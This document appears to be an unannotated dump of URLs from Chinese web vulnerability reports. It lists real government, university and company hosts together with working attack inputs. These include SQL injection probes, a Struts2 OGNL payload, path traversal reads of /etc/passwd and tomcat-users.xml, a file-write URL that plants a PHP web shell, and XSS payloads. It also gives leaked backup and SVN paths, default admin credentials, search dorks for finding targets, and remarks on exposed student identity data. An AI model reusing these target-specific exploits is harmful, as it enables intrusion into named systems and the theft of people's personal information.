http://hjhg.tjpu.edu.cn/base/admin/index.php http://www.xhfda.gov.cn/xhsp/hwcrm/login.php https://passport.tiancity.com/Login.ashx?jsoncallback=jsonp1397313384615&id=账号&pw=MD5加密后的密码&cp=&mt=<=0&st=1254&fl= http://www.zzzydj.gov.cn/Data/ http://md.ycmygs.com/publicAddresslistQuery.action http://tieba.baidu.com/p/2803224738 ip:60.13.169.xxx http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openId= http://activity.laiwang.com/ http://activity.laiwang.com/internal/Explorer?context=&fn=Resources&resource=%2FWEB-INF%2F http://activity.laiwang.com/internal/Webx/Info/System+Properties?spm=0.0.0.0.9gM2n4 http://xfjs.sicnu.edu.cn/admin/Login.html http://foodstory.benlai.com/使用的是wordpress,/wp-admin为后台,?author=$num可遍历用户名 coding:utf-8 http://www.dhc.net.cn/gds/csearch.jsp?ccd=10202000 http://smbk.forestry.gov.cn/login.jsp http://smbk.forestry.gov.cn:8099/lyj/txt/download.jsp?fileID=12305 http://in.sdo.com/wp-admin/后台对吧?之前我已经搞过一个账号的了。。但是感觉不给力。然后昨天晚上开了个8H的服务器去爆破了点用户出来 http://wenku.baidu.com/link?url=M6sMQbMxNeHCvkQRoES7u_noUc10m6DHDDGFok88bXIsUv8LAK4thkkluQJ_3wKoOJBl4TttTj1-v-zoSLyISD6wy2v36aen5ND3yc0v13S http://www.17558.net/post/731.html http://pan.baidu.com/s/1h6ftE http://gy.pylt.hk/ http://www.mxtx.net/ http://www.zjlovebank.com/db/%23uxdb.asa http://i.links.cn/robots.asp?weburl=127.0.0.1&pagecode= http://tool.zzbaike.com/spider http://seo.seowhy.com/spider/127.0.0.1 http://www.17ce.com/ http://aiwo.mobileclub.cn/user!goLogin.action http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21x&page=1 http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=1--&page=1 http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=2--&page=1 http://bbs.uuu9..com http://igame.qq.com/world/rank.php?all=1 http://igame.qq.com/qciroeha http://igame.qq.com/home/sendmsg.php?qq=qciroeha http://www.examw.com/ http://class.examw.com/player/teacher.asp?ClassID=105&tid=522414 http://class.examw.com/player/detail.asp?CourseID=5099&ClassID=20 http://web.2144.cn/cycs/zigw/server?sid=54 http://www.jzssfj.gov.cn/system/login.aspx www.cusdn.org.cn/zjwd/page_news_ck.php?pid=120101&eid=216 http://shop.178.com/search.php http://www.hbdaye.gov.cn/ http://www.nju.gov.cn:8080/ http://www.nju.gov.cn:8080/webuser/webuserupd.aspx?personid=211 http://www.nju.gov.cn:8080/webuser/webuserupd.aspx?personid=211 http://221.226.86.78/ http://imcs.vancl.com/robot/check-login.action http://imcs.vancl.com/robot/check-login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://imcs.vancl.com/robot/bak.jsp http://www.cceen.com/showinfo.asp?o=88 http://www.lbxdrugs.com/lbxdrugs.rar http://sellwt.cytobacco.com/login.do?method=init https://www.chanet.com.cn/ http://npoapp.gongyi.qq.com/blog/add http://www.jinqiangjc.com/admin/login.php?gotopage=%2Fadmin%2Findex.php http://ztdl.hnkjedu.com.cn/webeditor/Admin_Login.asp编辑器- http://www.hnkjedu.cn/liuyan/data/xycmsbook.asp www.zjrb.cn http://83.133.124.214/lol.c http://love.mendale.com.cn/ http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1 http://love.mendale.com.cn/webmaster/Index.aspx http://www.zt-express.com/ http://manager.zt-express.com/system/main.aspx,上图中绿框内账号登陆成功 www.dean.gxnu.edu.cn http://baoyang.pahaoche.com/member/get_password/username/asd http://www.cwts.org/ http://dlib.ncedu.gov.cn/Books.aspx?kinds=001 http://dlib.ncedu.gov.cn/SearchResult.aspx?kinds=all&content=a https://61.147.117.218 alumni.zstu.edu.cn/xyzhxt/ xyzh.gxnu.edu.cn/xyzhxt/ alumni.ahu.edu.cn/xyzhxt/ xyzh.jsu.edu.cn/xyzhxt/‎ xiaoyouhui.szpt.edu.cn/xyzhxt/ http://soufun.com/zhaopin/index.php?act=locationList&loc=%C7%E0%B5%BA https://61.148.57.182 http://oa.cnaaa.com/main/login.asp http://www.hbnsbd.gov.cn:8080/system/manager/terminalLogin.do http://www.enkj.com/domaindo/ymdo-info.asp?id=XXX http://wan.tgbus.com/kaifu/search/1 http://qlgk.jingjiang.gov.cn/admin inurl:phantomCMS http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2 http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2 http://222.92.198.27/phantomCMS/toSqwz.action?sid=2 http://www.liuxiang.gov.cn/phantomCMS/toSqwz.action?sid= http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2为例: http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%25%27 http://www.farmer.gov.cn/ http://bbs.g.pptv.com/thread-52017-1-1.html www.xiaoi.com)成立于2001年,是全球领先的智能机器人技术提供和平台运营商,拥有全球最大的智能机器人云服务平台,其直接和间接服务的用户在全球超过2亿。小i机器人(www.xiaoi.com)的网页版疑似存在命令执行。 http://imcs.vancl.com/robot/check-login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 site:bbs.hers.com.cn inurl:profile http://bbs.hers.com.cn/thread-59205741-1-1.html http://jxjy.bfa.edu.cn/bm/newslist.php?cid=7 http://202.102.41.37:8080/login/CmsSubmit.do http://202.102.41.36/login/login.do http://202.102.41.36/login/login.do http://202.102.41.159/robot/check-login.action http://202.102.41.159/robot/check-login.action http://202.102.41.153:80/Logout.action http://202.102.41.153:80/Logout.action http://202.102.41.160/robot/check-login.action http://202.102.41.160/robot/check-login.action http://202.102.41.207/robot/check-login.action http://202.102.41.235/doLogin.action http://202.102.41.235/doLogin.action http://online.sdu.edu.cn/news/article.php?pid=636526616 http://upload.jnby.com/ http://222.197.192.122/seeyon/main.do https://210.26.0.50/ http://fxy.xjtu.edu.cn/Show1.asp?id=204 http://fxy.xjtu.edu.cn/managesystem/editor/UploadFile/ http://kbs.cnki.net/other/lab.aspx?name=%E6%9D%90%E6%96%99 www.xzcz.gov.cn http://yjsy.nenu.edu.cn/ http://yyx.sicau.edu.cn/ https://61.150.40.166/?code=1 http://www.gs.edu.cn/ http://product.k12.com.cn/ http://www.google.de/#newwindow=1&q=inurl:cms/app/info/&start=10 http://www.wlyz.net/phpinfo.php http://www.sgedu.gov.cn/phpinfo.php http://www.wlsz.cn/phpinfo.php http://www.wledu.org/phpinfo.php http://sgyy.7659.com/database_info.php?id=10560 http://fknsg.7659.com/wp-admin/ http://www.xnsl.gov.cn/ http://www.hnacc.gov.cn/ http://14.23.152.207/admin/login.jsp,存在svn泄露,源码可读 http://14.23.152.207/.svn/text-base/autopub_log.jsp.svn-base http://www.chinahighway.gov.cn/ http://bbs.pcpop.com/forum.php?mod=viewthread&tid=10639870&extra= http://www.hnpost.com/E_AllUser.asp?order=time&order2=1 http://www.hnpost.com/web.rar,你懂的 http://www.hnpost.com/Ads/daima.asp?id=63 https://183.60.118.90 http://read.qidian.com/BookReader/.svn/entries www.miqi.cn http://www.miqi.cn http://db.catr.cn/mainpage.aspx http://xmldata.catr.cn/indexReal.jsp http://www.chinattl.com/ttlweb/display_A.aspx?id=2328 http://219.239.97.36/cn/showclass.asp?classid=187 http://219.239.97.36/cn/showclass.asp?classid=39 http://219.239.97.51/chinacc/ShowArticle.asp?ArticleID=1847 http://project.youku.com/fings/config/t.txt http://project.youku.com/fings/config/admin/ http://ods.vip.com/platform/plsmuser/login1.do http://business.china.com.cn/bsadmin/login.html http://11185.cn/ http://youth.cafuc.edu.cn/ http://www.ccag.cn/ http://www.ccag.cn/news.do?action=detail&id=201404091030287529 http://www.ccag.cn/webadmin/user.do?action=adm http://www.irissz.com/ http://203.86.28.246:81/stmsres/ http://218.64.59.73/stms/login.jsp http://kjgl.gzmed.gov.cn/stmsres/ http://pro.zhkgmx.gov.cn/stms/login.jsp http://researchnet.org/egrantweb/ http://www.kjxm.wst.hainan.gov.cn/stmsres/ http://pro.zhkgmx.gov.cn/stms/expert.jsp http://system.szexpert.gov.cn/stias/expertindex.jsp http://stias.szsitic.gov.cn/resstias/zxqyindex.html深圳市中小企业国际市场拓展资金管理系统 http://gxnsf.gxsti.net/stms/login.jsp https://kjyw.fskw.gov.cn/stmsres/ http://mmstms.gdsti.net/stms/main.jsp http://www.irissz.com/egrant.html http://218.64.59.73/stms/login.jsp http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34680 http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34678 http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34677 http://203.86.28.246:81/stmsres/ http://203.86.28.246:81/stms/orgUser.do?action=vEdit&psn_code=5903 http://203.86.28.246:81/stms/orgUser.do?action=vEdit&psn_code=5904 http://big5.china.com.cn/gate/big5/jx.china.com.cn/html/tupian/xinwen/2014/0415/464.html http://game.weibo.com/avatar/interface/userAvatarList http://www.hyjbld.com/Admin_Login.asp http://210.51.19.39:8000/trac,应该是个项目系统吧 interface:http://210.51.19.39:28017, http://cnpl.ems.com.cn/index.jsp admin:123456 http://wapmail.wo.com.cn/register.wo http://jpkc.smu.edu.cn/nk/bbs/Data/ok.aspx http://jpkc.smu.edu.cn/nk/bbs/Data/ASPda.asp http://jpkc.smu.edu.cn/nk/bbs/Data/bug.asp http://218.249.130.74/download.fe?filePath=e:/OA/Media/TemplateOfTaohong//../../../OA/database/fe_app5.mdf http://cp.timber2005.com/examreport/exam_result_t.aspx?infoid=1&type=Exam_Result_info http://home.focus.cn/decor/class.php http://home.focus.cn/elite/designer_list.php http://www.hnyanling.gov.cn/main/video/videoList.jsp?subjectid=99999999 http://www.hnyanling.gov.cn/main/video/videoList.jsp?subjectid=3345 http://www.hnyanling.gov.cn/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://trip.house.sina.com.cn/House/List/4?p=-50%20and%201=1 http://trip.house.sina.com.cn/House/List/4?p=-50%20and%201=2 http://joe.tom.com/joe_admin/login.php?gotopage=%2Fweiqi_admin%2F http://rz.game.tom.com/rzjfz_admin/login.php?gotopage=%2Frzjfz_admin%2F http://joe.game.tom.com/san.htm http://admin.wecity.co/login.action http://admin.tj.focus.cn/.bash_history http://admin.jn.focus.cn/.bash_history http://movie.damai.cn/ http://csldata.sports.sohu.com/admin.tar.gz http://adidas.sports.sohu.com/product_list.php http://golf.cctv.com http://202.117.3.62 http://202.117.3.62:5002/Login/LoginPageForuserB.aspx?SchoolName=%u897F%u5B89%u4EA4%u901A%u5927%u5B66&LogoutURL=http://202.117.3.62:5002/Default.htm site:bbs.lecai.com inurl:profile http://www.lecai.com/user/paypassword/update data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://otrans.oppo.com/index.php?q=index/login http://service1.oppo.com:8088/Login.aspx?ReturnUrl=%2fDefault.aspx www.xxoo.com/utility/convert/data/config.inc.php http://pan.baidu.com/s/1qWBAH3m bar.2144.cn/home/photolist/uid/10046887/lid/1*/page/1 bar.2144.cn/darenSquare/getFriends/?addr=hello&gender=all&occupation=all&page=1&pageSize=20 bar.2144.cn/game/getGames/?callback=jQuery18107313595172017813_1397587756036&order=new&page=1&pageSize=24&type=pid&typeValue=1&_=1397587911285 bar.2144.cn/gameScore/getMonthRankList/?gid=1&page=1&pageSize=62&t=0.5064357866067439 bar.2144.cn/gameScore/getUserRecord/?asc=1&page=1&pageSize=16&sort=week&uid=1 bar.2144.cn/gameScore/getWeekRankList/?gid=1&page=1&pageSize=62&t=0.974383644759655 http://cc.focus.cn/common/modules/dmc/loupandyview.php?id=696 http://cc.focus.cn/common/modules/dmc/loupandyview.php?id=696 http://nj.focus.cn/common/modules/dmc/loupandyview.php?id=101081 http://jn.focus.cn/prjbbs/yezhu.php?ID=150117 http://jn.focus.cn/prjbbs/yezhu.php?ID=150117 http://www.szsccb.com/ http://www.szsccb.com/config.jsp http://home.focus.cn/common/modules/sjspk/sjspk.php?id=31 http://home.focus.cn/common/modules/sjspk/sjspk.php?id=31 http://house.focus.cn/common/modules/newscenter/road_show_new.php?id=4 http://house.focus.cn/common/modules/newscenter/road_show_new.php?id=4 http://shaoyang.focus.cn/common/modules/go2map/gis_result.php?map=id&data_id=2170095'%20order%20by%2015%23 http://shaoyang.focus.cn/common/modules/go2map/gis_result.php?map=id&data_id=2170095'%20order%20by%2016%23 http://bbs.cntv.cn http://bbs.cntv.cn/cctvapi/Comment/english.php?id= http://www.07073.com/plus/flink.php http://f.dangdang.com/search/search.php?type=1&keyword=%3Csvg+onload%3Dalert%281%29%3E http://m.dangdang.com/gw_search.php?key=%3Csvg+onload%3Dalert%281%29%3E&so_gouwu=%E6%90%9C%E7%B4%A2&sid=2a68a94309929941&ref=index http://www.zjs.zju.edu.cn/ http://123.125.117.23:8080/auth/signOut,奇艺丘比特管理发布系统 http://blogimg.focus.cn/common/ http://dev.focus.cn/common/admin/admin_login.php?ru=http://blogimg.focus.cn/common/crm/ http://blogimg.focus.cn/common/admin/admin_login.php http://blogimg.focus.cn/common/app/?m=admin&c=app_admin&a=login http://blogimg.focus.cn/common/loupan/admin_header.php http://blogimg.focus.cn/common/loupan/investment/ http://blogimg.focus.cn/common/loupan/investment/?op=add http://blogimg.focus.cn/common/loupan/kfs/ http://blogimg.focus.cn/common/loupan/operate/a.php http://blogimg.focus.cn/common/loupan/investment/?op=add http://blogimg.focus.cn/common/loupan/kfs/ http://www.yikexun.cn/plus/flink.php http://blogimg.focus.cn/common/modules/sjspk/sjspk.php?id=62 http://iweidu.renren.com/ http://60.28.218.94/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS http://www.syx.gov.cn/hd/public/api/show.jsp?tid=affc9b23-b3ad-4403-af3a-c6a6a2ab28ad http://zkzs.nau.edu.cn/list.asp?bigid=У԰�Ļ� http://zkzs.nau.edu.cn/shownews.asp http://zkzs.nau.edu.cn/czjieguo.asp http://zkzs.nau.edu.cn/list.asp?bigid=99999999 http://zkzs.nau.edu.cn/1/user/user_zhuche_bc.asp http://www.gdofa.gov.cn/index.php/Arch/?id=169263 http://www.zjlscourt.com:808/phpmyadmin/ http://jwc.gzhmc.edu.cn/editor_new/upload.jsp http://sms.tom.com/ http://home.focus.cn/newscenter/newscenter.php?prep_subj_id=227 http://home.focus.cn/newscenter/newscenter.php?prep_subj_id=227 http://home.focus.cn/newscenter/media_list.php?source_name=%CC%EC%BD%F2%C8%D5%B1%A8 http://home.focus.cn/newscenter/media_list.php?source_name=%CC%EC%BD%F2%C8%D5%B1%A8 http://jxgl.fimmu.com/admin/Admin_Login.asp http://jxgl.fimmu.com/Database/SiteWeaver.mdb http://jxgl.fimmu.com/jwc/user/Upload.asp?dialogtype=UserBlogPic&size=5 http://www.seeyon.com/ http://www.seeyon.com/admin/ http://wizard.stock.hexun.com/sddy/zt361.aspx?id=2663&page=3 http://stockdata.stock.hexun.com/gszl/fhrzZzgb.aspx?id=002630&date=2014-03-25 http://m.yule.sohu.com http://www.csjjcgs.cn http://www.csjjcgs.cn/datasetService?sql=select%20*%20from%20v_yw_yhzcjbxx%20where%20rownum%3C10 http://house.focus.cn/reviewhouse/review_forum_detail.php?user_id=48299521 http://house.focus.cn/reviewhouse/review_forum_detail.php?user_id=48299521 http://sh.focus.cn/reviewhouse/review_forum_detail.php?user_id=1079683 http://tj.focus.cn/reviewhouse/review_forum_detail.php?user_id=20192951 http://cq.focus.cn/reviewhouse/review_forum_detail.php?user_id=1431154 http://sz.focus.cn/reviewhouse/review_forum_detail.php?user_id=1426996 http://www.lanshan.gov.cn/Vote.aspx?Id=12 http://www.zixing.gov.cn/spweb/virtualhall/instance/baseinfo.jsp?parentid=109&parentid_index=2 http://www.zixing.gov.cn/spweb/virtualhall/instance/baseinfo.jsp?parentid=109&parentid_index=99999999 http://www.zixing.gov.cn/cms/searchManage/search_process_zx.jsp^siteId=1&tagFlag=1&searchType=2&queryString=xxx http://www.zixing.gov.cn:80/spweb/virtualhall/instance/instancelist.jsp^gotopage=WCRTESTINPUT000002&applier=WCRTESTINPUT000000&project= http://www.zixing.gov.cn/comm_front/applyPublic/list.jsp^flownum=99999999 http://www.qy.gov.cn/Vote.aspx?Id=8 http://www.qy.gov.cn/cmsfile/extends/search/index.aspx?filepath=qyzfw&oper=bl&snumber=qy20131113044438713&scode=J18VST&Id=314 http://www.qy.gov.cn/message.aspx?source=xxclass&n=cjwt http://219.239.26.86/ http://www.352.com/communication/download.do?path=/etc/passwd&certname=passwd http://www.352.com/communication/download.do?path=/home/www/.bash_history&certname=bash_history http://www.352.com/communication/download.do?path=/app/soft/tomcat-www/conf/tomcat-users.xml&certname=users http://forexfirm.shihua.com.cn/status?full=true http://learning.haier.com/status?full=true http://www.xa189buy.cn/public/abeaaa.php http://corp.veryeast.cn/question/getresult.asp?newsid= http://www.12580emall.com/emall/index.jsp http://home.focus.cn/huodong/viewImg.php?p_id=21240 http://home.focus.cn/zxrj/diary.php?this_login_id=63273941&fitstep=%CA%D5%B7%BF%BD%D7%B6%CE http://home.focus.cn/zxrj/diary.php?this_login_id=61677208&fittype=%CB%AE%B5%E7%B8%C4%D4%EC http://zorpia.com/search/zorpians?ajax_search=1&keyword_quote=&start=33&update_criteria=1&pool=0&order=attractive&online=&country=Algeria&state=&city=&gender=female&age_from_search=18&age_to_search=25&_=727 http://fxy.xjtu.edu.cn/News_Show.asp?News_Id=1553 http://fxy.xjtu.edu.cn/bgxt/index.asp http://61.153.1.153/ http://house.focus.cn/common/modules/bank_loan/loan_product.php?p_id=117 http://house.focus.cn/common/modules/bank_loan/loan_search.php?product=1&business=2&bank_id=1&keywords= http://www.google.de/#newwindow=1&q=inurl:Logininner.aspx http://124.207.179.213/verify.aspx?SN_SERAL=1 http://218.94.9.17:8089/verify.aspx?SN_SERAL=1 http://www.fanwe.com/o2o http://o2o.fanwe.net/ http://o2o.fanwe.net/index.php?ctl=uc_center http://o2o.fanwe.net/public/comment/201404/17/10/1acafed8eeffa043489a4321b877e36690.jpg http://o2o.fanwe.net/es_file.php?username=admin&password=admin&act=0&file=http://o2o.fanwe.net/public/comment/201404/17/10/1acafed8eeffa043489a4321b877e36690.jpg&path=abe&name=aaa.php http://o2o.fanwe.net/public/abeaaa.php http://219.239.44.26/UDS/Views/Home/Index.aspx在此页面登陆,u:admin http://219.239.44.26/UDS/Views/fileUpload/SysDocument/test.asp http://yzb.bupt.edu.cn),进入“硕士研究生调剂系统”,其登陆窗可进行SQL注入,轻松登陆,调剂就是这么简单~ http://113.200.69.51/html/login.html http://220.196.57.147:8080/GetUnit.aspx?service http://www.thtf.com.cn http://jy.beijing.gov.cn/ http://jy.beijing.gov.cn/user/register.htm?action=personalDocument&awardid=52cb41893828606e0138e67a35d324fe&integral=10000 http://pop.xdf.cn/html/0311/4726.html http://oa.kjkd.com/存在SQL注入,Fuzzing发现用户名:'or http://www.bpeg.nc.sgcc.com.cn/ww/searchupdate.asp?textfield=% http://www.bpeg.nc.sgcc.com.cn/lyupdate.asp http://www.jinjianginns.com/Articlelist-65-2.html,左边酒店预订,选定城市后,点击下面的酒店位置,后台会发送一个post查询,查询数据为json格式,如下图 http://gs.hust.edu.cn/searchNews.do https://219.142.118.208/,新浪后台博客管理系统存在注入。 https://219.142.118.208//ac=validate?checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0×tamp=1397711970&username=admin http://210.28.80.170/dzpWEB/ http://59.67.148.50/dzpweb/ http://202.116.0.158/DzpWeb/ http://210.28.80.170/JJWEB/ http://222.24.19.99/jjweb/ http://zcc.neu.edu.cn/jjweb/ http://202.113.128.61/tsweb/ http://59.67.78.170:81/tsweb/index.asp http://219.219.35.55:81/tsweb/ http://202.197.190.5/TsWeb/ http://www.renren-inc.com/ http://tc.homelink.com.cn/ http://zjy.gdcost.com/print/examRegist.aspx?bmid=710** http://hnmsg.focus.cn/group/vinvite.php site:focus.cn inurl:invite.php?group_id= http://hnmsg.focus.cn/group/vinvite.php http://www.lsj.gov.cn/message/index.asp?typeid=1&ArticleID=7 http://www.lsj.gov.cn/message/index.asp?typeid=1&ArticleID=99999999 http://www.lsj.gov.cn/message/find.asp^findid=WCRTESTINPUT000000&password=99999999 http://www.lsj.gov.cn/search.asp^Keyword=xx&Field=Title&page= http://www.lsj.gov.cn/qy/ShowArticle.asp?ArticleID=9979 http://www.qibosoft.com/admin28319635 http://bbs.qibosoft.com/admin.php office.homeinns.com/Hcs/uploadfiles/123.aspx office.homeinns.com/Hcs/uploadfiles/lndex.xls.aspx office.homeinns.com/Hcs/uploadfiles/xxx.xls.aspx office.homeinns.com/Hcs/uploadfiles/doc.xls.aspx http://tv.tom.com/App_User_Dcprocess.php?flag=1&time=12:1:22&video_id=27493 http://www.sssgt.gov.cn/ http://glxy.glut.edu.cn/team.php?pid=99999999 http://glxy.glut.edu.cn/class.php?do=a&pid=5 data:pid=5 http://glxy.glut.edu.cn/class.php?do=a&pid=99999999 url:http://glxy.glut.edu.cn/inter.php?id=64 data:id=64 http://glxy.glut.edu.cn/mba.php?pid=99999999 data:pid=99999999 http://departs.glut.edu.cn/mksxy/company.asp^ename=intro http://departs.glut.edu.cn/mksxy/jgsz.asp?cls=0^ename=kyjg http://departs.glut.edu.cn/mksxy/schools.asp?cls=0^ename=sdfc http://departs.glut.edu.cn/mksxy/kcjs.asp?cls=0^ename=cghj http://departs.glut.edu.cn/mksxy/kygz.asp?cls=0^ename=kylj http://departs.glut.edu.cn/mksxy/yqsjy.asp?cls=0^ename=zsjy http://departs.glut.edu.cn/mksxy/djgz.asp?cls=0^ename=ghgz http://departs.glut.edu.cn/mksxy/new.asp?cls=0^ename=notice http://departs.glut.edu.cn/mksxy/lytt.asp?cls=0^ename=xsjz http://departs.glut.edu.cn/mksxy/jgszs.asp?cls=0^ename=xyfc http://flv.deppon.com http://www.gzgwbn.net.cn/yyt/index.php?m=content&c=index&a=lists&catid=15 http://202.117.120.37/xdjwWeb/practiceAdmin/graduationDesign/studentSeeA/ http://202.117.120.37/xdjwWebNew/practiceAdmin/graduationDesign/studentSeeA/ http://url/see_A_abstract.jsp?gtIndex=2 http://url/see_A_abstract.jsp?gtIndex=-1 http://202.116.160.122/eol/homepage/common/opencourse/ http://www.12580mms.cn/index.jsp http://www.kunshan.travel/ks/wz/hoteldt.jsp?LanID=51&catid=48&subtypeid=4 http://game.pipi.cn/enterGame.action?server_id=186 http://game.pipi.cn/enterGame.action?server_id=186 view-source:http://www.ximei.org/admin/left.php http://mse.tju.edu.cn/gtxb/artl.php?ty=7&tp=1 http://210.47.163.50:8080/jxyj/projectView/projectView.jsp?pid=20110260 http://en.damai.cn/All_Tickets.aspx?key=music%%27%20AND%201=1%20AND%20%27%%27=%27 http://en.damai.cn/All_Tickets.aspx?key=music%%27%20AND%201=2%20AND%20%27%%27=%27 http://www.foowu365.com/page/contact/?id=1 http://www.foowu365.com/page/html/?id=1 http://www.foowu365.com/page/contact/?id=1后面加 http://www.zjlscourt.com/e/admin/index.php http://zx.xj169.com/web/getSmsPwdCode.action http://www.mlr.gov.cn/mlr.zip http://m.test.app.uc.cn/apk_bak/apk_1015_test/index.php?system=source&module=search&action=search&uc_param_str=dnfrpfbivesscpmibtbmntnisiei&keyword= http://user.byecity.com/OrderDetail_NoLogin.aspx?orderID=415106&byecityunionid=0&mobile=13466711111&ordernum=435336&email=xxxx281@qq.com http://bar.2144.cn/tuya/getList/?order=1&page=1&pageSize=15&recommand=1&t=0.8865182718727738&type=3 http://me.07073.com/center/sendRetMail site:bbs.155.cn inrul:profile http://www.gxu.edu.cn/040310\wygl\showtzgg.php?id=9942 http://www.gxu.edu.cn/040310\wygl\showtzgg.php?id=99999999 http://xxx http://115.182.51.52/ http://wooyun.org/bugs/wooyun-2010-055785 http://www.17ugo.com/user.php?act=get_password http://www.yicike.com/9119-Tku/ http://www.spedu.gov.cn/html/soft/zhanghao.doc bjuu.xdf.cn/pp/plugins/lightbox/save_history.php http://www.zhsi.gov.cn/uploadServlet?url=../../../../../../../../../etc/passwd http://www.zhsi.gov.cn/search.jsp?vl=&hidOption=query&sel_query_sslm=&sel_query_sslm2=&query_jdNr=1%27%20or%201=1%20-- http://www.tchjbh.gov.cn/www.zip http://www.ja12333.cn/jayb/pages/czsc.doc http://www.ja12333.cn,输入图片内容所示的账号,任意修改帐号的后两位数,登录密码不变。 URL:http://www.sclottery.gov.cn/files/Sctc/pages/news_classcontent.jsp?currentPage=1&page=1&text_type_id=29&totalPage=35 http://cas.gzife.edu.cn/cas/login?service=http%3A%2F%2Fi.gufe.edu.cn%2Fdcp%2Findex.jsp选择登陆旧版,然后进入,选择二本教务系统,妹子的什么信息都出来了,身份证,手机号,户籍地址 http://jwc.gzife.edu.cn/_photo/student/201200004084g4xfwHAl2A.JPG http://jwc.gzife.edu.cn/_photo/student/201200004085IjXCGr61xF.JPG http://jwc.gzife.edu.cn/_photo/student/201200004086H28Fb5XuyL.JPG http://news.ncu.edu.cn/ztxw.asp http://www.t5y.cn/inc/news_2.asp?id=3951 http://www.cr15g1c.com/showarticle.php?aid=6199 www.ahedu.gov.cn/285/view/12.shtml?id=20 www.ahedu.gov.cn/285/view/14.shtml?id=25 www.ahedu.gov.cn/285/view/5.shtml?id=9 www.ahedu.gov.cn/search?option=all&querycode=%5c&searchtype=shbs http://m.tv.sohu.com/v1723058.shtml?channeled=1210010600%27 http://d.gd.189.cn/absp/ http://localhost/skin/def_black/style7.css android:authorities="com.huawei.dbank.v7.provider.DbankGallery android:name="com.huawei.dbank.v7.service.data.album.GalleryProvider android:readPermission="com.huawei.dbank.v7.provider.DbankGallery.READ_DATABASE android:writePermission="com.huawei.dbank.v7.provider.DbankGallery.WRITE_DATABASE"/ android:authorities="com.huawei.dbank.v7.provider.DBank android:name=".service.data.DBankProvider android:readPermission="com.huawei.dbank.v7.provider.DBank.READ_DATABASE android:writePermission="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/ android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE"/ android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/ android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE android:protectionLevel="dangerous android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE android:protectionLevel="dangerous https://61.154.174.73/ http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openID= http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=1 http://tiku.huatu.com/.svn/entries http://www.hbzx.gov.cn/newsList.jsp?type=1&typeid=0&classid=3 http://www.jljt.gov.cn/ http://wooyun.org/bugs/wooyun-2014-053985 http://www.nari-relays.com/zhaobiao/showcg.php?id=i http://www.nari-relays.com/zhaobiao/showancg.php?id=i http://www.nari-relays.com/zhaobiao/showancg.php?id=i http://www.qdcqly.com/line/show.asp?id=926 http://hezuo.sh.189.cn/ http://samplex.qihoo.net/site/login http://zz.comsenz.com/2014ydzx/index.php?action=all&typeid=1 http://www.52mxp.com/,IP地址:61.155.238.29 http://www.wdly.gov.cn//主站 http://innershine.youku.com/bai/admin/admin.php http://cifu.baofeng.com/index.php?controller=admin http://59.173.244.25/kscf/ http://bbs.phpdisk.com/thread-5143-1-1.html http://www.didipai.com/user/emailormobileforgetpasswordresult?status=0&passport=[这里替换成你想重置的账户]&tokenid=73406489353311481423051892958193151486864158342960196658317655427268455499547645007481857817900171327093576925213578394016711331472520369241443765705013405594103129928882058297047581725621829110151382323988366311935625801410993412816035042248572709908038512735040654169451834039555178510360634502810037622212&randtoken=de31f6ed31be494bacfe990728391f2a http://www.didipai.com/user/emailormobileforgetpasswordresult?status=0&passport=jason_chen163@163.com&tokenid=73406489353311481423051892958193151486864158342960196658317655427268455499547645007481857817900171327093576925213578394016711331472520369241443765705013405594103129928882058297047581725621829110151382323988366311935625801410993412816035042248572709908038512735040654169451834039555178510360634502810037622212&randtoken=de31f6ed31be494bacfe990728391f2a http://202.194.29.247/SysManage/ http://202.194.29.247/user/ http://202.194.29.247/temp/ http://202.194.29.247/scripts/ http://202.194.29.247/review/ http://202.194.29.247/Log/ http://202.194.29.247/Images/ http://202.194.29.247/img/ http://202.194.29.247/wzgl/ http://202.194.29.247/aspnet_client/ http://202.194.29.247/aspnet_client/system_web/ http://www.dx.gansu.gov.cn/cms/common/filechoose/filedialog.jsp?webappcode=A61&filetype=1&webapppath=freeform&uploadpath=../../../ http://www.131qz.com/www.zip http://www.131qz.com/admin http://www.chjsj.gov.cn/admin/admin_add.asp http://www.chjsj.gov.cn/admin/AdminIndex.asp http://bbs.gmw.cn http://search.auto.tom.com/admin/main.jsp 